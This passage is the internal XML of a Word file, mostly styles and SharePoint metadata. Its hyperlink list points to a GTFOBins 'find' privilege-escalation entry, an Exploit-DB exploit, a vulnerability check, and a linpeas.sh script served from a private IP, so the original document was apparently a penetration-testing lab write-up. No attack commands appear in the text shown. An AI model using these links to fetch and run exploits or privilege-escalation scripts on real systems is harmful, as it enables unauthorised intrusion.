    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="001E371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057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8054A"/>
    <w:rPr>
      <w:color w:val="605E5C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054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054A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD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58054A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D37364"/>
    <w:pPr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 w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D37364"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D37364"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D37364"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D37364"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D37364"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002A551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321E3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="004321E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7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tfobins.github.io/gtfobins/find/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/21665" TargetMode="External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1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://192.168.138.128:8000/linpeas.sh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hyperlink" Target="https://gtfobins.github.io/gtfobins/find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www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.103582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1F3A30DAD9F14689267BCEB8248A35" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c2866e42f3582ed609e4600cbcd1ba18">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="31171297-1df8-4b24-a55f-abb35a5e24f6" xmlns:ns3="0a96d139-f179-434b-8dff-7f6d26393868" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e2597b290b9a00ddff769f7ea48d6e90" ns2:_="" ns3:_="">
    <xsd:import namespace="31171297-1df8-4b24-a55f-abb35a5e24f6"/>
    <xsd:import namespace="0a96d139-f179-434b-8dff-7f6d263938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71297-1df8-4b24-a55f-abb35a5e24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96d139-f179-434b-8dff-7f6d2639386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a96d139-f179-434b-8dff-7f6d26393868">
      <UserInfo>
        <DisplayName>Amy  Martin</DisplayName>
        <AccountId>69</AccountId>
        <AccountType/>
      </UserInfo>
      <UserInfo>
        <DisplayName>Sam Smith</DisplayName>
        <AccountId>1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F8917-350D-4D44-A002-DCE9F987F2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71297-1df8-4b24-a55f-abb35a5e24f6"/>
    <ds:schemaRef ds:uri="0a96d139-f179-434b-8dff-7f6d263938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F8DC9A-8262-4EE2-A21C-2693DD3D381B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="0a96d139-f179-434b-8dff-7f6d26393868"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{516D115F-8248-4E5D-AE1B-579DC05E16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445BC18-F523-425C-B80F-35440BC31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2</Pages>
  <Words>1550</Words>
  <Characters>884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mith</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Phillip Newlove</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-16T15:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-17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1F3A30DAD9F14689267BCEB8248A35</vt:lpwstr>
  </property>
</Properties>
</file>